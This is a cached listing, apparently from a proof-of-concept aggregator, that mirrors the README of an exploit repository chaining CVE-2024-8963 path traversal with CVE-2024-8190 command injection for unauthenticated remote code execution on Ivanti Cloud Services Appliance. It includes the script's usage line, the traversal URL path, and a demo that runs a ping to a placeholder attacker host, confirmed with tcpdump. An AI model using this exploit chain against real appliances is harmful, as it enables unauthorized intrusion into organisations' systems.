CVE-2024-8190 PoC — Ivanti Cloud Services Appliance 安全漏洞

Source

https://github.com/flyingllama87/CVE-2024-8190-unauth

Associated Vulnerability

Title:Ivanti Cloud Services Appliance 安全漏洞 (CVE-2024-8190)
Description:Ivanti Cloud Services Appliance（Csa）是美国Ivanti公司的一种 Internet 设备。可通过 Internet 提供安全的通信和功能。 Ivanti Cloud Services Appliance 4.6 版本之前存在安全漏洞，该漏洞源于包含一个操作系统命令注入漏洞。经过身份验证的远程攻击者利用该漏洞可以获得远程代码执行。

Description

Combining CVE-2024-8963 & CVE-2024-8190 - For Unauthenticated RCE on Ivanti CSA 4.6 and below

Readme

## CVE-2024-8190 unauthenticated

### Description
Combining CVE-2024-8963 &amp; CVE-2024-8190 - PoC for Unauthenticated RCE on Ivanti CSA 4.6 and below.

**CVE-2024-8963**
> Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality.

**CVE-2024-8190**
> An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability.

This PoC combines the two to demonstrate how CVE-2024-8190 can be used unauthenticated.

### Usage

```
python3 ./cve-2024-8190.py <target_url> '<CMD>'
```

#### Demo

```
$ python3 ./cve-2024-8190.py https://<target> 'ping -c 4 <attacker>'
[!] WARNING: This script is for authorized testing and educational purposes only. Unauthorized use is illegal.
[*] Fetching https://<target>/client/index.php%3F.php/gsb/datetime.php...
[+] Got LDCSA_CSRF value: sid:483045<REMOVED>
[*] Sending payload...
[!] Request timed out. Check if the command executed on the target.
```

#### Response
```
$ sudo tcpdump -n "icmp" -l
11:43:15.135004 IP <target> > <attacker> ICMP echo request, id 30001, seq 1, length 64
11:43:16.135647 IP <target> > <attacker>: ICMP echo request, id 30001, seq 2, length 64
11:43:17.137707 IP <target> > <attacker>: ICMP echo request, id 30001, seq 3, length 64
11:43:18.137085 IP <target> > <attacker>: ICMP echo request, id 30001, seq 4, length 64
```

### Thanks

Horizon3.ai's CVE-2024-8190 PoC this is heavily based off: <BR />
https://github.com/horizon3ai/CVE-2024-8190

ProjectDiscovery's nuclei template for CVE-2024-8963.yaml: <BR />
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8963.yaml

P.S. ProjectDiscovery rocks!

### Disclaimer

Don't be a dickhead.

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

File Snapshot


 [4.0K]  /data/pocs/ba11d8c3c065cf664e45f4d69c320035c0e86adb
├── [2.2K]  cve-2024-8190.py
└── [2.2K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!